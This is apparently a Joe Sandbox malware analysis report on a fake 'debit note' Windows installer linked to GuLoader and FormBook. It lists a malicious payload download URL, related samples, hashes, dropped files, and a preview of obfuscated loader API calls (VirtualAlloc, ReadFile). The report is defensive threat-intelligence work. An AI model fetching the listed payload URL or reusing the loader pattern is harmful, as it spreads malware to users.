https://gitak.top/KGukxUu155.binurT	debit-note-19-08-dn-2024.exe, 00000002.00000002.15712696739.0000000005B88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gitak.top/KGukxUu155.bin/	debit-note-19-08-dn-2024.exe, 00000002.00000003.11581389160.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.14000992557.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12317895879.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11686619558.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12739439973.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12423346131.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13055004776.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11792316254.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12002181719.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12528773141.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12212380394.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11265319416.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.13160268819.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11370941693.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.12634148231.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, debit-note-19-08-dn-2024.exe, 00000002.00000003.11160023125.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.207.219	gitak.top	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1499056
Start date and time:	2024-08-26 15:29:49 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	debit-note-19-08-dn-2024.exe
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@3/10@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 79% Number of executed functions: 49 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: debit-note-19-08-dn-2024.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.207.219	z41_EX24-772_24.exe	Get hash	malicious	GuLoader	Browse
	qEW7hMvyV7.exe	Get hash	malicious	FormBook	Browse
	z1_____________.exe	Get hash	malicious	FormBook, GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gitak.top	doc09125520240407073114.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.22.240
	HE9306_AWBLaser_Single240812144358.exe	Get hash	malicious	GuLoader	Browse	172.67.207.219
	z41_EX24-772_24.exe	Get hash	malicious	GuLoader	Browse	172.67.207.219
	_EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.22.240
	qEW7hMvyV7.exe	Get hash	malicious	FormBook	Browse	172.67.207.219
	z9T__VAUSTRIATURK-TEKL__F.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.22.240
	z1_____________.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.207.219
	vV389MGvCt9jWzm.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PO List.html	Get hash	malicious	Unknown	Browse	172.67.172.217
	specifications.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	https://ch3.dlvideosfre.click/kjnsdfsvf	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/22kjhsfdh67	Get hash	malicious	Unknown	Browse	104.18.3.35
	https://wetransfer.com/downloads/e3c914f2e6f4651b1445415756262fa620240826020905/640d590327db92754fa0159c45d4f92720240826020905/4529de?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid	Get hash	malicious	Unknown	Browse	104.26.0.90
	http://in.eodcnetworkdirect.com/link?messageId=%3C1ffa719c-b87a-sl35-4bd8-91e3-06f513ec6e0e@eodcnetworkdirect.com%3E&url=//phsdobrasil.ind.br/events/	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.Evo-gen.18513.13360.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	https://pentaleon.com/?sragyzsragyz	Get hash	malicious	Unknown	Browse	104.21.22.213
	http://click.email.traininng.com/?qs=7e52e1e342fe8135e162991521b111fc8d4368e9710ce6f89c938f976c8b8a6e8dedd476ad120e7ccc9751e86cfbe363f8d3560eb970585def87511f7d5427ca	Get hash	malicious	Unknown	Browse	104.18.70.113
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	ep_setup.exe	Get hash	malicious	Unknown	Browse	172.67.207.219
	nFLv1PupGS.dll	Get hash	malicious	Unknown	Browse	172.67.207.219
	nFLv1PupGS.dll	Get hash	malicious	Unknown	Browse	172.67.207.219
	file.exe	Get hash	malicious	Clipboard Hijacker, PureLog Stealer, Stealc, Vidar	Browse	172.67.207.219
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.207.219
	FortiClientOnlineInstaller.exe	Get hash	malicious	Vidar	Browse	172.67.207.219
	a.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.207.219
	Anfrage f#U00fcr ein Angebot - Musterkatalog.vbs	Get hash	malicious	FormBook, GuLoader	Browse	172.67.207.219
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.207.219
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.207.219

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll	HE9306_AWBLaser_Single240812144358.exe	Get hash	malicious	GuLoader	Browse
	HE9306_AWBLaser_Single240812144358.exe	Get hash	malicious	GuLoader	Browse
	z41_EX24-772_24.exe	Get hash	malicious	GuLoader	Browse
	z41_EX24-772_24.exe	Get hash	malicious	GuLoader	Browse
	_EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe	Get hash	malicious	FormBook, GuLoader	Browse
	_EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe	Get hash	malicious	GuLoader	Browse
	PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe	Get hash	malicious	GuLoader	Browse
	PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe	Get hash	malicious	GuLoader	Browse
	2024090533201.exe	Get hash	malicious	Remcos, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\App.ini

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.75216571132969
Encrypted:	false
SSDEEP:	3:a6QLQIfLBJXlFGfv:xQkIPeH
MD5:	797DA95245047A54F125FBF3B19FA295
SHA1:	9E46F51C033836343C4099609F35B9B62C290A00
SHA-256:	A047914D1DB23829E36D3A2A908D83F4B51F5A8194AE090BB9F9AB9F8DDA9128
SHA-512:	4755C72A469C7C816D7B4A08BFEABFC266AAD029156A301E2592E3AFD16C5DB5FCE44C4475CB83C43B859A06AD069370182FCA5CAFACF4A27D191F4C0AE34A03
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Loading]..Start=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.656006343879828
Encrypted:	false
SSDEEP:	192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
MD5:	3E6BF00B3AC976122F982AE2AADB1C51
SHA1:	CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
SHA-256:	4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
SHA-512:	1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse Filename: z41_EX24-772_24.exe, Detection: malicious, Browse Filename: z41_EX24-772_24.exe, Detection: malicious, Browse Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse Filename: PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe, Detection: malicious, Browse Filename: PROJRCTS_INQUIRY_SPECIFICATIONS_DRAWING_SAMPLES.exe, Detection: malicious, Browse Filename: 2024090533201.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsc47EB.tmp

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	data
Category:	dropped
Size (bytes):	425059
Entropy (8bit):	6.492264923451216
Encrypted:	false
SSDEEP:	6144:qRP7Sfw7mc55PPLrSwwPxUEf9BUWrTQAyCY4xZyL4i/yrlmh2suWOOufV5a:4P7IcLNwHUWnO4fyL4jrlmhbuXC
MD5:	56074DE62B2FE4CCC5906532BF729C62
SHA1:	352E7F71C32F6B974CEE9BE59DCBEA1257EB37BD
SHA-256:	A7022A661A55C0679DF510D460786911EF9DCF090AB0E2BFDF2AEB5776DF1623
SHA-512:	E84667D77854B3996F75FE36F5B49B2FE99AB487FC90F32D45C10A0CDBD432167858F954013EAD56ED23FA386B860E15DCBD205631B40E8872713356FC5B3F08
Malicious:	false
Reputation:	low
Preview:	f.......,...................[...................f...........................................................................................................................................................................................................................................G...J...........e...j.........................................................................................................................................../...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	4.134336113194451
Encrypted:	false
SSDEEP:	3:iGAeSMn:lAeZ
MD5:	7AB6006A78C23C5DEC74C202B85A51A4
SHA1:	C0FF9305378BE5EC16A18127C171BB9F04D5C640
SHA-256:	BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
SHA-512:	40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Access]..Setting=Enabled..

C:\Users\user\brugerlicensaftalerne\Anam.Tra

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	data
Category:	dropped
Size (bytes):	13390
Entropy (8bit):	4.527773348664665
Encrypted:	false
SSDEEP:	192:ZIh2g9y8px5TSdP6V5kT+kU3Dr9W2jEk+SlVUDVN:ah2gwQ5TSF6PktgDrQaHDK
MD5:	2A2EBC2FA44FD1D75481C6CAAB1695E4
SHA1:	5A59085A600674418CCFD1B81F6CB58A062D94A7
SHA-256:	3A505BAA89729E166CF0173A702F15DC34592872BDF6A69105D4DC5677DE21CF
SHA-512:	200377184F413650F690D424565B7DEE8DEDBB9E58CC84666BA027C5ABF1EBBC6B75BA8BE697F07F1514C1FEDAAB044A532B5BC93D81A9EDBA466F0E1CBE58CD
Malicious:	false
Reputation:	low
Preview:	.....JJJ.........y.........WWW......................NN..>.??.@@........9.......22......Z...I...k...e...r..>n...e...l...3...2...:.*:...C...r...e...a...t.X.e..>F..Zi...l...e...A...(...m... ...r...4... ...,..$ ...i... ...0...x..F8...0...0...0...0...0..^0...0...,... ...i... ...0...,... ...p.OO ...0...,... ...i... ...4...,... ...i... ...0..9x.W.8..t0...,.GG ...i.s. ...0...)...i.......r...8...q...k.I.e...r...n...e.J.l...3...2...:.yy:..VS.3.e...t...F...i...l...e...P...o..[i...n...t...e...r...(...i... ...r...8...,... ..Vi... ...2...3...0...1...2... ...,... ...i... ...0..L,...i... ...0...)...i.......r...4...q...k...e..^r...n...e...l...3...2...:...:...V...i...r...t...u...a...l...A...l...l...o...c...(...i... ...0...,...i... ..{7...0...5...6...5..@8..8...8...,... ...i..< ...0...x...3...0...0...0..s,... ...i..* ...0..Ox...4...0..=)...p.......r...2...q...k..ye...r...n...e...l...3...2...:...:...R.>.e...a...d...F.\|\|i...l...e...(...i... .D.r...8.SS,... ...i... ...r...2...,... ...i... ...7...0...5...6

C:\Users\user\brugerlicensaftalerne\Isidora\gaadefulde.txt

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	485
Entropy (8bit):	4.232571417138926
Encrypted:	false
SSDEEP:	12:ZvQJDLIkJHTjbxleUuXCrM+loDMsjHoIIFVVUIgib:ZvQvzjlleUuXso9ZWVy6
MD5:	3AF0252A9A2814A66060B5602FEFB22A
SHA1:	C03E5A75AC4B95C5FC3631EA80E3182FBAD4F03B
SHA-256:	2467A15368DFEDFB6156E0C02D2A958DBB18456051665A317CB7628E32FB046F
SHA-512:	3E0CF8FB7D600FD0E228A24163A54F7820B8575AE2D49C048A0D16A923716AF7AD868C4951C09D2C941EABDF9E6EDA081C16A68338BCFDD46CC5A682EC82ED10
Malicious:	false
Preview:	tomandstelte haggling hunknsvsens faq indulgentness dermestid daabsfadene spillereglernes hngerv..aktieprotokols overenskomststridige moonwort exion dolkestdslegender.otomian steading thoracomelus spaltedefinitionernes paracelsist stikkel urkokkens disuses sunniest counterlighted spadeformede depreciative coset..snnekonens soundings karotiner dutte.scoparin unglittery bdestraffes land synkefrdig kadaya..tildragelsers fjerkrfarmenes trailerite differentialize plejeforldre concaves.

C:\Users\user\brugerlicensaftalerne\Isidora\mininetwork.bil

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	data
Category:	dropped
Size (bytes):	34424
Entropy (8bit):	3.2127370751221456
Encrypted:	false
SSDEEP:	768:XeemGABJJ8rAL0xf2NDjhS8t5L/bKNEwLeRmQTid9:XeXfBJarAL0IlVSutjed9
MD5:	357C239C8A128101281301765FAE888E
SHA1:	C06BA64C77BA6E06E4AEF81076946E2E14475719
SHA-256:	BDFD76CAC29B8F8C3852AE9332E26BAD07838999BC81F50A05CC9513A5DF661F
SHA-512:	A2B185AF74AAAB903DC7B34FB7C9017D01FA44F0FDB903E3FB68EEE88F783AD5DC9D73731A37B181C911C036950BE193794105250BC277F9F7A38ED0DCDA81A5
Malicious:	false
Preview:	................z.-...............,..........s.....+.......@..,.......+n.$........f....H.........u..y..................t.......]...............$..........................\|..............<'........n.........RD.......vk...................b.....g........+..........&t...8....&......6.$'...,.............v.0........................e...]./.........,...............................@..G.............../................................-....8.........l.............&S..e...............%.........[\|.....A............j.....%............r..........l...........................:.....f7.................................[.......................M.............................g.....n...................h......................7...............1...D...............!....0....b.........!..}.......4......................H...........a......0......................rzG......$.....ty.[..8....t..........................ix[... ..#X~.....................Z_................ ............b.....W...Hq................9....2......

C:\Users\user\brugerlicensaftalerne\Photostatting.bak

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	data
Category:	dropped
Size (bytes):	284395
Entropy (8bit):	7.494018575020684
Encrypted:	false
SSDEEP:	6144:nfw7mc55PPLrSwwPxUEf9BUWrTQAyCY4xZyL4i/yrlmh2sr:fcLNwHUWnO4fyL4jrlmhbr
MD5:	9CFDB6FACB7D10B9AA1C82CDBB445F33
SHA1:	391C6DBE051F1ABD8B77D8627C9883E9392485AC
SHA-256:	0171AB74E03848F6A071617FCC12849E3A61BD966A74A3C94796B7C8041BDA53
SHA-512:	6C4DAB89FDEDDFB1DA2976EE33B7FE315763CC117351CEC59F0B2E0804B06EA543E0552DF5C2BC987D277B938F9B1DA42A857E63E2FC162CE84B47918C496A46
Malicious:	false
Preview:	.....vv......P.X......)))........ii............a......................S..........%%..........;;;;.......................................mmm...^^......"".p........j.........!....HH........XX.........FF..........e........ccccc......v......................bb..{.....[..............h..........n.........HH...............$$$$...............4....X.aa..................Q.@......22.........)................V.................888888....................................###...[[...'........................\|\|.qq....ccc.................................555..........KKK.......=..<.^^..F............{{.^....U...................==.3........................666...".P..-.............%%%............{{{{{{{...11........T...............................................44444.....B...........ll.=.....................X.....................\.....0000..........f........K...hh...........SS.........;.E.N..........._.''..z....l.......T..!!.ww.......777.............A......................W.Q...../...........R.oo..K..NNN.0..

C:\Users\user\brugerlicensaftalerne\armless.ude

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 211-0, spot sensor temperature -2251799813685248.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
Category:	dropped
Size (bytes):	46432
Entropy (8bit):	3.2136461621363517
Encrypted:	false
SSDEEP:	768:ASGyNzhlBd5sdPN1A1Qh0prboupWEK6zFx+UHd:n7lBd5QNw9ok/Fx39
MD5:	AE7B67A58B022BEFCC6C3B1922A12AE3
SHA1:	ADBF63E7714B4968A236C3BFDC6EBB1ED24DD996
SHA-256:	6EE65A08717947BA0023F0ABC4E60A08E1A638C067D8DCC9CA7B0645859D916F
SHA-512:	712018BDF5981A0601728BF4FC2A27971F13E0DAC6AA4774957B91D9631DBCF81B66B85D4216ABA34B243DBD0402FB7BFB11A92B3566278CA7DAC057C1A455CC
Malicious:	false
Preview:	......._h1....................Q.................Z..........a.....!...........W8........%..w.................G........................7.......... .7......e..........................................s...'.....................................y............&i..................H........:...........`....d....%@S.\|~....T.........<....4...................j..................................................E...N...e.....x.k...5X........................7.........O-.................................Y."...!.......-................o......4........n..d.................f......./........................7......V...>.....y...C......<.......-.......................4........................)..............................&.w........./.3..........n..u...;......Ad......E...~.....o...~..................................w.................c........."..........\......B..x.........\|...>..B.............................0.....E......."...................rB.................................?....................4.xP....

C:\Users\user\brugerlicensaftalerne\buxus.bog

Download File

Process:	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
File Type:	data
Category:	dropped
Size (bytes):	26080
Entropy (8bit):	3.20612396093193
Encrypted:	false
SSDEEP:	384:p7ctcY4i68lGFjVq4cPpf3NNMG63AzpZWoI64ICEaHFf8CXvRU:pgtgrsGFY4Q3DL63AzpZc+s00pU
MD5:	6843BC02ED836FABDD0C402C93BD6070
SHA1:	8CA940C30AAFD3E2B41A54A98E3359A7E70F6F01
SHA-256:	E8500F97DC807D1A6FFA7D6EC3001C51281398B6BA21DFB66418D4D193E31FFB
SHA-512:	8995001C1662F7D4BD43EBF2DA40AC17513419FC150901E45E14A72EEF58A032D1F70CAFFED893BEF0AB360968BD132472D2171B3C3C790D8796DAA4A34E2E59
Malicious:	false
Preview:	.........`...................'...2........... .#.................8.................x........&....=.......F...."..........x.+....0e.T..........................)........K........z.R..Y....Qr.......................+..........>.$.%....,..5................S....zg.....'.....$......+..D..................M........s........3.....................X...........F.......................D..........................v....3....E.....A....._...................................`............ ....i.....................Q.........._........................C.E...T................................N.....I{.......F........4....k................................................x....[......L........................................#..xt.3......J..................................4....6................................^..R......_...........}..\|....._......................8......./..............................................U...............G................u.2..........o.......&........+.........M..............;........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.93777579175851
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	debit-note-19-08-dn-2024.exe
File size:	330'962 bytes
MD5:	5133f0baa9ab594674eae836fd1491c7
SHA1:	389ab5a5e7ed520406265e0a1adc14d5ff478c4a
SHA256:	e13fd3d42fb6c63fcf7780701282f760bd4aaa6ad1cdb55cc586e1aca8caaf2a
SHA512:	0b1be90e58591907084f7262c60b0fb92de18bce2ad5e47aaa3592a9795a7c4d0fd4301c58427588361ac626cd19f59ba1c362b41765765e0b3d1e093fe427e3
SSDEEP:	6144:XW+7+eMMKlVXkYuF6ECJ4D3aJ6SXfBBJEh3LO3Arcp:XRLKlVXREC2qJLX/JU3yz
TLSH:	7B6412427ACBC13AFBC25A30DB66DE7AF2B6D604052603473F216FF52931286C569367
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....n3T.................`.........Z3.......p....@

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x40335a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Entrypoint Preview

Instruction
sub esp, 000002D8h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+14h], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000009h
mov dword ptr [004292B8h], eax
call 00007F6708B8881Ah
mov dword ptr [00429204h], eax
push ebp
lea eax, dword ptr [esp+38h]
push 000002B4h
push eax
push ebp
push 004206A8h
call dword ptr [0040717Ch]
push 0040937Ch
push 00428200h
call 00007F6708B88485h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007F6708B88473h
push ebp
call dword ptr [0040710Ch]
push 00000022h
mov dword ptr [00429200h], eax
pop edi
mov eax, ebx
cmp word ptr [00434000h], di
jne 00007F6708B85909h
mov esi, edi
mov eax, 00434002h
push esi
push eax
call 00007F6708B87EC3h
push eax
call dword ptr [00407240h]
mov ecx, eax
mov dword ptr [esp+1Ch], ecx
jmp 00007F6708B859FBh
push 00000020h
pop edx
cmp ax, dx
jne 00007F6708B85909h
inc ecx
inc ecx
cmp word ptr [ecx], dx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4d000	0xb10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ec6	0x6000	60ec0c4d80dd6821cdaced6135eddfd5	False	0.6593424479166666	data	6.438901783265187	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202f8	0x600	99cdd6cde9adee6bf3b24ee817b4574b	False	0.4830729166666667	data	3.8340327961758165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x23000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4d000	0xb10	0xc00	254b81c9e7cdc6038a0abfd972e7779c	False	0.4134114583333333	data	4.250827316191816	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4d1c0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x4d4a8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4d5a8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4d6c8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4d790	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x4d7f0	0x14	data	English	United States	1.2
RT_MANIFEST	0x4d808	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
